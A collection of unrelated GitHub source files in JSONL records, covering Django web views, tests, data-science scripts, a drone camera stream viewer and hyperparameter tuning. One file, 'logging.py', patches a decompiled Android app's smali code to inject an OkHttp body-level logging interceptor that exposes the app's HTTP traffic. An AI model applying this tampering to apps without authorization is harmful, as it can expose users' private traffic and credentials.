newsapi.get_news(es_info.company)\n\n # 企業の情報 (ワードクラウドなど)\n company_info = self._get_company_info(request, es_group_id)\n\n context = {\n 'message': 'OK',\n 'es_info': es_info,\n 'formset_management_form': formset.management_form,\n 'zipped_posts_info': zip(post_set, formset, related_posts_list),\n 'news_list': news_list,\n 'company_info': company_info,\n }\n return render(request, template_name, context)\n else:\n # 指定されたESが存在するが,それが違う人のESの場合\n context = {\n 'message': '違う人のESなので表示できません',\n 'es_info': {},\n 'zipped_posts_info': (),\n }\n return render(request, template_name, context)\n else:\n # 指定されたESが存在しない場合\n context = {\n 'message': '指定されたESは存在しません',\n 'es_info': {},\n 'zipped_posts_info': (),\n }\n return render(request, template_name, context)\n\n\ndef 
get_related_post(request):\n pk = int(request.GET.get('pk', ''))\n es = PostModel.objects.get(pk=pk)\n print(es.question, es.answer, sep='¥n')\n return JsonResponse({'question': es.question, 'answer': es.answer})\n\n\ndef get_wordcloud_path(request):\n es_group_id = int(request.GET.get('es_group_id', ''))\n es_group = ESGroupModel.objects.get(pk=es_group_id)\n company_url = es_group.company_url\n\n # WordCloudModelにwordcloud_pathが存在している場合はその画像のパスを取り出す\n try:\n print(company_url + ' already exists')\n wordcloud_path = WordCloudModel.objects.get(company_url=company_url).word_cloud_image_url\n # 存在しない場合は新しくワードクラウドを作成\n except WordCloudModel.DoesNotExist:\n try:\n wordcloud_path = get_wordcloud(company_url)[1:]\n print(wordcloud_path)\n # データベースに保存\n\n new_word_cloud = WordCloudModel(company_url=company_url,\n word_cloud_image_url=wordcloud_path)\n new_word_cloud.save()\n print('created new word cloud')\n except:\n print('error from word_cloud')\n return JsonResponse({'image_path': '/static/esuits/images/wordcloud_failed.png'})\n return JsonResponse({'image_path': wordcloud_path})\n","repo_name":"jphacks/D_2014","sub_path":"esuits/esedit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8186,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"15614937187","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url, include\nfrom django.core.urlresolvers import reverse\nfrom django.http import QueryDict\nfrom django.test import TestCase, RequestFactory\nfrom djangular.middleware import DjangularUrlMiddleware\n\nTEST_URLCONF_PATH = 'server.tests.test_urlresolver_view'\n\n\ndef dummy_view(request, *args, **kwargs):\n return {\n 'name': 'DummyView',\n 'request': request,\n 'args': args,\n 'kwargs': kwargs\n }\n\n\ndef dummy_view2(request, *args, **kwargs):\n return {\n 'name': 'DummyView2',\n 'request': request,\n 'args': args,\n 'kwargs': kwargs\n }\n\ninclude1 = patterns('',\n url(r'^home2/$', dummy_view2, name='home2')\n)\n\nurlpatterns = patterns('',\n url(r'^$', dummy_view, name='home'),\n url(r'^(\\d)/(\\d)/(\\d)/$', dummy_view, name='home_args'),\n url(r'^(?P\\d)/(?P\\d)/(?P\\d)$', dummy_view, name='home_kwargs'),\n url(r'^include/', include(include1, namespace='include1'))\n)\n\n\nclass TestUrlResolverView(TestCase):\n pattern_dict = None\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = DjangularUrlMiddleware(urlconf='server.tests.test_urlresolver_view')\n self.url_name_arg = 'djng_url_name'\n self.args_prefix = 'djng_url_args'\n self.kwarg_prefix = 'djng_url_kwarg_'\n super(TestUrlResolverView, self).setUp()\n\n def test_resolver_path_resolution(self):\n url_name = 'home'\n data = {\n self.url_name_arg: url_name\n }\n request = self.factory.get(DjangularUrlMiddleware.ANGULAR_REVERSE, data=data)\n self.middleware.process_request(request)\n self.assertEqual(request.path, reverse('home', urlconf=TEST_URLCONF_PATH))\n\n def test_resolver_path_resolution_include(self):\n url_name = 'include1:home2'\n data = {\n self.url_name_arg: url_name\n }\n request = self.factory.get(DjangularUrlMiddleware.ANGULAR_REVERSE, data=data)\n self.middleware.process_request(request)\n self.assertEqual(request.path, reverse(url_name, urlconf=TEST_URLCONF_PATH))\n\n def test_middleware_request_not_modified(self):\n \"\"\"\n If request.path != request must not be modified\n \"\"\"\n path = '/some/other/url'\n request = self.factory.get(path)\n self.middleware.process_request(request)\n 
self.assertEqual(request.path, path)\n\n def test_get_args(self):\n \"\"\"\n GET parameters for url resolution should be removed, others kept\n \"\"\"\n args = {'test': '123'}\n data = {\n self.url_name_arg: 'home_args',\n self.args_prefix: [1, 2, 3],\n }\n data.update(args)\n query_dict = QueryDict('', mutable=True)\n query_dict.update(args)\n\n request = self.factory.get(DjangularUrlMiddleware.ANGULAR_REVERSE, data=data)\n self.middleware.process_request(request)\n self.assertEqual(request.GET, query_dict)\n\n def test_kwargs_resolution(self):\n data = {\n self.url_name_arg: 'home_kwargs',\n self.kwarg_prefix + 'id': 1,\n self.kwarg_prefix + 'id2': 2,\n self.kwarg_prefix + 'id3': 3\n }\n request = self.factory.get(DjangularUrlMiddleware.ANGULAR_REVERSE, data=data)\n self.middleware.process_request(request)\n self.assertEqual(request.path, reverse('home_kwargs',\n kwargs={'id': 1, 'id2': 2, 'id3': 3},\n urlconf=TEST_URLCONF_PATH))\n","repo_name":"zdimon/angular","sub_path":"main/static/library/django-angular/examples/server/tests/test_urlresolver_view.py","file_name":"test_urlresolver_view.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22856667356","text":"from datastructuretools.hashmap import *\nfrom systemtools.hayj import *\nfrom twinews.utils import *\n\ndef toCache(cacheFields, *args):\n theJoin = \" \".join(list(cacheFields.keys()))\n for arg in args:\n if not isinstance(arg, list):\n arg = [arg]\n for current in arg:\n if current in theJoin:\n return True\n return False\n\ndef getVector(url, field, cache, newsCollection):\n row = newsCollection.findOne({'url': url}, projection={field: True})\n theHash = objectToHash(row[field])\n return cache[theHash]\n\ndef dictSelect(theDict, keys):\n return dict((k, theDict[k]) for k in keys if k in theDict)\n\ndef getGenericCache(key, readOnly=False, logger=None, verbose=True):\n if readOnly:\n user = 'student'\n else:\n user = 'hayj'\n (user, password, host) = getMongoAuth(user=user)\n if not key.startswith(\"twinews-\"):\n key = \"twinews-\" + key\n return SerializableDict\\\n (\n key,\n user=user, host=host, password=password,\n useMongodb=True, logger=logger, verbose=verbose,\n )\n\ngenericFields = \\\n{\n 'dbert-ft': 'detokText',\n 'dbert-base': 'detokText',\n 'infersent': 'detokSentences',\n 'usent': 'detokText',\n 'sent2vec': 'detokSentences',\n 'doc2vec': 'sentences',\n 'bert': 'detokSentences',\n 'stylo': 'detokText',\n 'nmf': 'sentences',\n 'tfidf': 'sentences',\n 'word2vec': 'sentences',\n 'bow': 'detokSentences',\n}","repo_name":"hayj/Twinews","sub_path":"twinews/models/genericutils.py","file_name":"genericutils.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1928881622","text":"import polars as pl\n\nfrom vi import Agent, Config, Simulation\n\n\nclass MyAgent(Agent):\n def update(self):\n # As accurate proximity calculation is quite performance heavy,\n # we only calculate it once per frame.\n in_radius = self.in_proximity_accuracy().count()\n\n # We want to keep track of how many other agents were in our agent's radius,\n # so we add data to the `in_radius` column of our dataframe!\n self.save_data(\"in_radius\", in_radius)\n\n # If at least one agent is within our agent's radius, then we turn red!\n if in_radius > 0:\n self.change_image(index=1)\n else:\n # Otherwise we turn white.\n 
self.change_image(index=0)\n\n\nprint(\n # We're using a seed to collect the same data every time.\n Simulation(Config(duration=300, radius=10, seed=1))\n .batch_spawn_agents(\n 1000,\n MyAgent, # 👈 use our own MyAgent class.\n images=[\n \"examples/images/white.png\",\n \"examples/images/red.png\",\n ],\n )\n .run()\n .snapshots.groupby(\"frame\")\n # Count the number of agents (per frame) that see at least one other agent (making them red)\n .agg((pl.col(\"in_radius\") > 0).sum().alias(\"# red agents\"))\n .select(\"# red agents\")\n # Create a statistical summary including the min, mean and max number of red agents.\n .describe()\n)\n","repo_name":"m-rots/violet","sub_path":"examples/data-analysis.py","file_name":"data-analysis.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"24288104968","text":"from collections import deque\nN, K = map(int, input().split())\nqueue = deque([int(i) for i in range(1,N+1)])\n\nwhile len(queue) != 1 :\n for j in range(K-1) :\n queue.append(queue.popleft())\n queue.popleft()\nprint(queue[0])\n\n\n#queue 이용 X\n\"\"\"\nN, K = map(int, input().split())\nprinces = [int(i) for i in range(1,N+1)]\nstart = 0\nwhile len(princes) != 1 :\n index = (start + (K-1))%len(princes)\n del princes[index]\n start = index\n\nprint(princes[0])\n\"\"\"","repo_name":"Yuunhye/Problem_Solving","sub_path":"Study_/공주 구하기.py","file_name":"공주 구하기.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38489551246","text":"import os\nfrom distutils.dir_util import copy_tree\nimport shutil\n\nokhttp_file_name = 'OkHttpClient.smali'\n\n_method_declaration = \".method private static giveMeInterceptors()Ljava/util/List;\\n\"\n_method_end = \".end method\\n\"\n\n_lines = [\"\\t.locals 2\\n\", \"\\tnew-instance v0, Lokhttp3/logging/HttpLoggingInterceptor;\\n\", \"\\tinvoke-direct {v0}, Lokhttp3/logging/HttpLoggingInterceptor;->()V\\n\", \"\\tsget-object v1, Lokhttp3/logging/HttpLoggingInterceptor$Level;->BODY:Lokhttp3/logging/HttpLoggingInterceptor$Level;\\n\", \"\\tinvoke-virtual {v0, v1}, Lokhttp3/logging/HttpLoggingInterceptor;->setLevel(Lokhttp3/logging/HttpLoggingInterceptor$Level;)Lokhttp3/logging/HttpLoggingInterceptor;\\n\", \"\\tnew-instance v1, Ljava/util/ArrayList;\\n\", \"\\tinvoke-direct {v1}, Ljava/util/ArrayList;->()V\\n\", \"\\tinvoke-interface {v1, v0}, Ljava/util/List;->add(Ljava/lang/Object;)Z\\n\", \"\\treturn-object v1\\n\"]\n\n_constructor = \".method public constructor (Lokhttp3/OkHttpClient$Builder;)V\"\n_needle = \"invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getInterceptors$okhttp()Ljava/util/List;\"\n\n_create_interceptors = \"\\tinvoke-static {}, Lokhttp3/OkHttpClient;->giveMeInterceptors()Ljava/util/List;\\n\"\n\ndef add_http_logging(app_folder):\n okhttp_folders = _get_okhttp_folder(app_folder)\n if len(okhttp_folders) == 0:\n return False\n\n for folder in okhttp_folders:\n _add_logging_folder(folder)\n \n okhttp_files =_get_okhttp_file(app_folder)\n \n for f in okhttp_files:\n _add_logging_method(f)\n _call_logging_method(f)\n return True\n \n\ndef _get_okhttp_folder(app_folder):\n okhttp_folders = []\n for root, dirs, files in os.walk(app_folder):\n if root.endswith(\"okhttp3\"):\n okhttp_folders.append(root)\n return okhttp_folders\n\ndef _add_logging_folder(okhttp_folder):\n shutil.rmtree(okhttp_folder + \"/logging\", ignore_errors=True)\n 
copy_tree(\"logging\", okhttp_folder + \"/logging\")\n\ndef _get_okhttp_file(app_folder):\n detected_files = []\n for root, dirs, files in os.walk(app_folder):\n if okhttp_file_name in files:\n path = os.path.join(root, okhttp_file_name)\n detected_files.append(path)\n return detected_files\n\n\ndef _add_logging_method(okhttp_file):\n file_lines = open(okhttp_file, 'r').readlines()\n\n file_lines.append(\"\\n\")\n file_lines.append(_method_declaration)\n for item in _lines:\n file_lines.append(item)\n file_lines.append(_method_end)\n file_lines.append(\"\\n\")\n\n with open(okhttp_file, 'w') as okhttp_file:\n for item in file_lines:\n okhttp_file.write(item)\n return True\n\ndef _call_logging_method(okhttp_file):\n file_lines = open(okhttp_file, 'r').readlines()\n # Find the line we need to modify\n needle_index = list(filter(lambda x: _needle in x[1] , zip(range(len(file_lines)), file_lines)))[0][0]\n\n # Check the constructor index\n constructor_index = list(filter(lambda x: _constructor in x[1], zip(range(len(file_lines)), file_lines)))[0][0]\n\n # Check if the call we need to change is used inside the right constructor\n is_good = len(list(filter(lambda x: \".method\" in x[1] and x[0] < needle_index and x[0] > constructor_index, zip(range(len(file_lines)), file_lines)))) == 0\n\n if is_good == False:\n return False\n\n # Change line with our own method that creates interceptors\n file_lines[needle_index] = _create_interceptors\n\n with open(okhttp_file, 'w') as okhttp_file:\n for item in file_lines:\n okhttp_file.write(item)\n return True \n\n","repo_name":"felHR85/Uncertify","sub_path":"logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"45111720617","text":"import sys\n\nimport pandas as pd\n\n\ndef show_parquet(path: str):\n df = pd.read_parquet(path=path)\n print(df)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 2:\n show_parquet(sys.argv[1])\n else:\n print(\"missing path\")\n exit(1)\n","repo_name":"HT-Tuan/MLopsVN","sub_path":"utils/show_parquet.py","file_name":"show_parquet.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6866446397","text":"from django.shortcuts import render,redirect\nfrom order.models import Order\nfrom order.forms import OrderForm\nfrom authenticate import Authentication\n# Create your views here.\n@Authentication.valid_user\ndef index(request):\n order=Order.objects.all()\n print(order)\n return render(request,'order/index.html',{'order':order})\n\n@Authentication.valid_user\ndef create(request):\n print(request.POST)\n if request.method==\"POST\":\n form=OrderForm(request.POST)\n form.save()\n request.session.clear()\n return redirect(\"/\")\n","repo_name":"ayush-f/helmet_nepal","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22780416620","text":"# A função countdown abaixo tem como objetivo fazer uma contagem regressiva\n# partindo de n até zero.\n\n\ndef countdown(n):\n if n == 0: # caso base\n print(\"FIM!\")\n else:\n print(n)\n countdown(n - 1) # caso recursivo\n\n\ncountdown(5)\n","repo_name":"Marcio-Gabriel-Roque-Mendes/Trybe_exercise","sub_path":"Exercicios/4 - Ciencia da 
Computacao/bloco-34-algoritmos/dia-2-recursividade-e-estrategias-para-solucao-de-problemas/conteudo-1-leis-de-recursao/contagem_regressiva.py","file_name":"contagem_regressiva.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73066914347","text":"#!/usr/bin/py\nimport os\nimport pandas as pd\nimport numpy as np\nimport pybedtools\nfrom pybedtools import BedTool\n\n\ndf = pd.read_table('/nobackup/shilab/Data/novogene/Counts/R697.counts')\ndf = pd.DataFrame(df)\n\ngtf = BedTool('/nobackup/shilab/Data/novogene/Counts/gencode.v25.annotation.gtf').to_dataframe()\n\ntranscripts = gtf[gtf.feature == 'transcript']\n\nannot = pd.DataFrame()\nannot['gene_id'] = transcripts['attributes'].apply(lambda x: x.split('\"')[1])\nannot['gene_id'] = annot['gene_id'].apply(lambda x: x.split('.')[0])\n\nannot['target_id'] = transcripts['attributes'].apply(lambda x: x.split('\"')[3])\nannot['target_id'] = annot['target_id'].apply(lambda x: x.split('.')[0])\n\nannot = annot.reset_index().drop('index',1)\n\ndf_genes = df.merge(annot, on='target_id').drop('target_id', 1)\n\ndf_genes_group = df_genes.groupby(['gene_id']).sum()\n\ndf_genes_group_round = df_genes_group.apply(lambda x: x.round(0), 0).reset_index()\n\ndf_genes_group.to_csv('/nobackup/shilab/Data/novogene/edgeR_count_matrix.csv', index=True)\ndf_genes_group_round.to_csv('/nobackup/shilab/Data/novogene/edgeR_count_matrix_round.csv', index=False)\n\ndf2 = df.head().apply(lambda x: x.round(0), 0)\n\nresults = pd.read_table('/nobackup/shilab/Data/novogene/Counts/differentially_expressed_genes_edgeR_R697_IGFBP7_silencing_gencodeV24_significant_only_cpm_cut.txt').reset_index()\n\nmart = pd.read_table('/nobackup/shilab/Data/novogene/Counts/gencode.v25.annotation.gtf').rename(columns={'Ensembl Gene ID':'index'})\n\nresults_mart = results.merge(mart, on='index')\n\nresults_mart.to_excel('/nobackup/shilab/Data/novogene/Counts/differentially_expressed_genes_edgeR_R697_IGFBP7_silencing_gencodeV24_significant_only_cpm_cut_named_phenotypes.xlsx', index=False)","repo_name":"cmlnodzak/tools","sub_path":"cell_phenotyper.py","file_name":"cell_phenotyper.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3189488247","text":"import argparse\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, GdkPixbuf, GLib\nimport threading\nimport time\nimport socket,os,struct\n\n#save image and visualize\nimport numpy as np\nimport cv2 \nimport binascii\nimport io \n# import Image\nfrom PIL import Image\n\ndeck_ip = None\ndeck_port = None\n\nclass ImgThread(threading.Thread):\n def __init__(self, callback):\n threading.Thread.__init__(self, daemon=True)\n self._callback = callback\n\n def run(self):\n print(\"Connecting to socket on {}:{}...\".format(deck_ip, deck_port))\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.connect((deck_ip, deck_port))\n print(\"Socket connected\")\n\n imgdata = None\n imgdata_complete = None\n timestamp = 0\n\n while(1):\n strng = client_socket.recv(512)\n\n # Look for start-of-frame and end-of-frame\n start_idx = strng.find(b\"\\xff\\xd8\")\n end_idx = strng.find(b\"\\xff\\xd9\")\n\n # Concatenate image data, once finished send it to the UI\n if start_idx >= 0:\n # append the end of the packet\n imgdata += strng[:start_idx]\n # save data of the entire image (without the footer)\n 
imgdata_complete = imgdata\n # append the beginning of the next image\n imgdata = strng[start_idx:]\n # search the footer inside the image and ignore it (temporary fix)\n end_idx = imgdata_complete.find(b\"\\xff\\xd9\")\n if end_idx >= 0 and imgdata_complete:\n imgdata_complete = imgdata_complete[0:end_idx] + imgdata_complete[end_idx+2:]\n # append the footer string to the image\n imgdata_complete = imgdata_complete + (b\"\\xff\\xd9\")\n\n try: # show frame\n self._callback(imgdata_complete)\n except gi.repository.GLib.Error:\n print(\"image not shown\")\n pass\n\n else: # Continue receiving the image\n if imgdata is None:\n imgdata = strng\n else:\n imgdata += strng\n\n\n \n# UI for showing frames from AI-deck example\nclass FrameViewer(Gtk.Window):\n\n def __init__(self):\n super(FrameViewer, self).__init__()\n self.frame = None\n self.init_ui()\n self._start = None\n self.set_default_size(374, 294)\n\n def init_ui(self): \n self.override_background_color(Gtk.StateType.NORMAL, Gdk.RGBA(0, 0, 0, 1))\n self.set_border_width(20)\n self.set_title(\"Connecting...\")\n self.frame = Gtk.Image()\n f = Gtk.Fixed()\n f.put(self.frame, 10, 10)\n self.add(f)\n self.connect(\"destroy\", Gtk.main_quit)\n self._thread = ImgThread(self._showframe)\n self._thread.start()\n\n def _update_image(self, pix):\n self.frame.set_from_pixbuf(pix)\n\n def _showframe(self, imgdata):\n # Add FPS/img size to window title\n if self._start is not None:\n fps = 1 / (time.time() - self._start)\n GLib.idle_add(self.set_title, \"{:.1f} fps / {:.1f} kb\".format(fps, len(imgdata)/1000))\n self._start = time.time()\n img_loader = GdkPixbuf.PixbufLoader()\n\n # Try to decode JPEG from the data sent from the stream\n try:\n img_loader.write(imgdata)\n pix = img_loader.get_pixbuf()\n GLib.idle_add(self._update_image, pix)\n except gi.repository.GLib.Error:\n print(\"Could not set image!\")\n img_loader.close()\n\n# Args for setting IP/port of AI-deck. 
Default settings are for when\n# AI-deck is in AP mode.\nparser = argparse.ArgumentParser(description='Connect to AI-deck JPEG streamer example')\nparser.add_argument(\"-n\", default=\"192.168.4.1\", metavar=\"ip\", help=\"AI-deck IP\")\nparser.add_argument(\"-p\", type=int, default=5000, metavar=\"port\", help=\"AI-deck port\")\nargs = parser.parse_args()\n\ndeck_port = args.p\ndeck_ip = args.n\n\nfw = FrameViewer()\nfw.show_all()\nGtk.main()\n\n\n","repo_name":"pulp-platform/AI-deck-workshop","sub_path":"Hands-on/Session 4/GAP8/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"}
{"seq_id":"18997230208","text":"\"\"\"Discord cog for all Wavelink events\"\"\"\nimport logging as logger\n\nimport discord\nimport wavelink\nfrom discord.ext import commands\n\nfrom src.essentials.errors import MustBeSameChannel, NotConnectedToVoice\nfrom src.utils.responses import Responses\n\n\nclass ErrorHandler(commands.Cog):\n \"\"\"\n Cog that triggers on error events.\n \"\"\"\n\n def __init__(self, bot: commands.Bot) -> None:\n self.bot = bot\n bot.tree.on_error = self.on_app_command_error\n self.responses = Responses()\n\n async def on_app_command_error(\n self,\n interaction: discord.Interaction,\n error: discord.app_commands.AppCommandError,\n ):\n \"\"\"Triggers when an error is raised.\"\"\"\n await interaction.response.defer()\n\n if isinstance(error, NotConnectedToVoice):\n return await interaction.followup.send(\n embed=await self.responses.user_not_in_vc()\n )\n if isinstance(error, MustBeSameChannel):\n player: wavelink.Player = wavelink.NodePool.get_node().get_player(\n interaction.guild.id\n )\n return await interaction.followup.send(\n embed=await self.responses.already_in_voicechannel(\n channel=player.channel\n )\n )\n\n\nasync def setup(bot):\n \"\"\"\n Setup for the cog.\n \"\"\"\n await bot.add_cog(ErrorHandler(bot))\n","repo_name":"Its-Haze/Dj-Braum-Music","sub_path":"src/cogs/error_handler.py","file_name":"error_handler.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"22653733755","text":"import json\nimport time\nimport warnings\nfrom datetime import timedelta\nimport math\nfrom os import makedirs\nfrom os.path import join as joinpath\n\nimport numpy as np\nfrom hyperopt import Trials, fmin, space_eval, tpe\nfrom hyperopt.mongoexp import MongoTrials\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.model_selection import GroupKFold, KFold, StratifiedKFold\nfrom sklearn.utils import shuffle\n\nfrom config import K_FOLD_K_VALUE, RANDOM_STATE, RESULTS_DIR\nfrom utils import compute_loss, compute_metric\nfrom .timeout import set_timeout, TimeoutError\n\n\ndef tune_all_models_on_all_datasets(\n task_type,\n datasets,\n models,\n tuning_trials_per_step=5,\n max_tuning_time=120,\n max_trials_without_improvement=150,\n tuning_step_max_time=60,\n mongo_address=None,\n):\n warnings.filterwarnings(\"ignore\", category=ConvergenceWarning)\n\n minimum_runtime = max_tuning_time * len(models) * len(datasets)\n print(f\"Expected minimum runtime: {timedelta(seconds=minimum_runtime)}\")\n\n for dataset in datasets:\n print(f\"Dataset: {dataset.__name__}\")\n train, test = dataset.get()\n for model in models:\n print(f\"Model: {model.__name__}\")\n try:\n train_data, _ = model.prepare_dataset(\n train, test, dataset.categorical_features\n )\n\n 
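# run the hyper-parameter search for this model/dataset pair\n 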
tune_hyperparams(\n task_type,\n dataset,\n model,\n train_data,\n tuning_trials_per_step,\n max_tuning_time,\n max_trials_without_improvement,\n tuning_step_max_time,\n mongo_address,\n )\n except MemoryError:\n print(\n \"Memory requirements for this model with this dataset are too high\"\n )\n\n\ndef tune_hyperparams(\n task_type,\n dataset,\n model,\n train_data,\n tuning_step_size,\n max_tuning_time,\n max_trials_wo_improvement,\n tuning_step_max_time,\n mongo_address,\n):\n kfold, train_data = create_kfold(task_type, dataset, train_data)\n objective_fct = create_tuning_objective(dataset, model, train_data, kfold)\n\n # No tuning for models without hyper-parameters\n is_model_tunable = hasattr(model, \"hp_space\")\n if not is_model_tunable:\n loss = objective_fct(None)\n print(f\"Resulting {dataset.metric}: {-loss}\")\n return\n\n if tuning_step_max_time > 0:\n make_tuning_step_w_timeout = set_timeout(make_tuning_step, tuning_step_max_time)\n else:\n make_tuning_step_w_timeout = make_tuning_step\n\n # Tuning loop\n if mongo_address is not None:\n trials = MongoTrials(\n mongo_address, exp_key=f\"{dataset.__name__}-{model.__name__}\"\n )\n else:\n trials = Trials()\n start_time = time.time()\n rstate = np.random.RandomState(RANDOM_STATE)\n n_trials_wo_improvement = 0\n time_left = True\n while time_left and n_trials_wo_improvement < max_trials_wo_improvement:\n try:\n make_tuning_step_w_timeout(\n objective_fct, model.hp_space, trials, rstate, tuning_step_size\n )\n except TimeoutError:\n pass\n n_trials_wo_improvement = update_n_trials_wo_improvement(trials)\n time_left = (time.time() - start_time) < max_tuning_time\n tuning_time = time.time() - start_time\n\n process_tuning_result(trials, tuning_time, model, dataset)\n\n\ndef update_n_trials_wo_improvement(trials):\n if len(trials.trials) == 0:\n return 0\n best_trial = min(\n trials.trials,\n key=lambda r: r[\"result\"][\"loss\"]\n if r[\"result\"][\"status\"] == \"ok\"\n else math.inf,\n )\n best_trial_index = sorted(t[\"tid\"] for t in trials.trials).index(best_trial[\"tid\"])\n\n return len(trials.trials) - best_trial_index\n\n\ndef process_tuning_result(trials, tuning_time, model, dataset):\n n_sucessful_trials = len(\n [None for t in trials.trials if t[\"result\"][\"status\"] == \"ok\"]\n )\n if n_sucessful_trials == 0:\n print(\"No trials finished within allowed time\")\n return\n\n tuning_results_dir = joinpath(RESULTS_DIR, dataset.__name__, model.__name__)\n\n best_trial = min(\n trials.trials,\n key=lambda r: r[\"result\"][\"loss\"]\n if r[\"result\"][\"status\"] == \"ok\"\n else math.inf,\n )\n best_trial_index = sorted(t[\"tid\"] for t in trials.trials).index(best_trial[\"tid\"])\n best_loss = best_trial[\"result\"][\"loss\"]\n best_hp_raw = {\n k: v[0] if len(v) else None for k, v in best_trial[\"misc\"][\"vals\"].items()\n }\n best_hp = space_eval(model.hp_space, best_hp_raw)\n\n best_score = -best_loss if dataset.is_metric_maximized else best_loss\n\n save_tuning_results(\n tuning_results_dir,\n best_hp,\n best_score,\n best_trial_index,\n tuning_time,\n dataset.is_metric_maximized,\n )\n\n print(f\"Best {dataset.metric}: {best_score:.2f}\")\n print(f\"With hyperparams: \\n{best_hp}\")\n print(f\"Obtained after {best_trial_index} trials\")\n print(f\"Total number of sucessful trials: {n_sucessful_trials}\")\n print(f\"Total tuning time: {tuning_time:.1f}s\")\n\n\ndef make_tuning_step(objective_fct, hp_space, trials, rstate, step_size):\n fmin(\n objective_fct,\n hp_space,\n algo=tpe.suggest,\n 
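# grow the eval budget by one step; fmin resumes from the trials already recorded\n 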
max_evals=len(trials.trials) + step_size,\n trials=trials,\n show_progressbar=True,\n rstate=rstate,\n )\n\n\ndef create_tuning_objective(dataset, model, train, kfold):\n def objective(args):\n try:\n estimator = model.build_estimator(args, train)\n metric_values = []\n X, y, *_ = train\n for train_index, val_index in kfold.split(*train):\n X_train, X_val = X[train_index], X[val_index]\n y_train, y_val = y[train_index], y[val_index]\n\n estimator.fit(X_train, y_train)\n metric_value = compute_metric(\n y_val, estimator.predict(X_val), dataset.metric\n )\n metric_values.append(metric_value)\n if not getattr(dataset, \"needs_k_fold\", True):\n break\n\n return compute_loss(dataset.metric, metric_values)\n except ValueError:\n \"\"\" With some hyper-parameter combinations, a ValueError can be raised during training\n (in particular MLPRegressor)\n \"\"\"\n return {\"status\": \"fail\"}\n\n return objective\n\n\ndef create_kfold(task_type, dataset, train_data):\n if task_type == \"classification\":\n n_splits = min(K_FOLD_K_VALUE, dataset.get_min_k_fold_k_value(train_data))\n kfold = StratifiedKFold(n_splits, shuffle=True, random_state=RANDOM_STATE)\n elif task_type == \"regression\":\n if getattr(dataset, \"need_grouped_split\", False):\n train_data = shuffle(*train_data, random_state=RANDOM_STATE)\n kfold = GroupKFold(n_splits=K_FOLD_K_VALUE)\n else:\n kfold = KFold(\n n_splits=K_FOLD_K_VALUE, shuffle=True, random_state=RANDOM_STATE\n )\n return kfold, train_data\n\n\ndef save_tuning_results(\n tuning_results_dir, hyperparams, score, n_trials, tuning_time, is_metric_maximized\n):\n makedirs(tuning_results_dir, exist_ok=True)\n\n try:\n with open(\n joinpath(tuning_results_dir, \"tuning.json\"), \"r\", encoding=\"utf-8\"\n ) as file:\n prev_results = json.load(file)\n if is_metric_maximized:\n better_results = score > prev_results[\"score\"]\n else:\n better_results = score < prev_results[\"score\"]\n except FileNotFoundError:\n better_results = True\n\n if better_results:\n results = {\n \"hp\": hyperparams,\n \"score\": score,\n \"n_trials\": int(n_trials),\n \"tuning_time\": tuning_time,\n }\n with open(\n joinpath(tuning_results_dir, \"tuning.json\"), \"w\", encoding=\"utf-8\"\n ) as file:\n json.dump(results, file, ensure_ascii=False, indent=4)\n","repo_name":"hantoine/ml-algorithms-benchmark","sub_path":"utils/tuning.py","file_name":"tuning.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
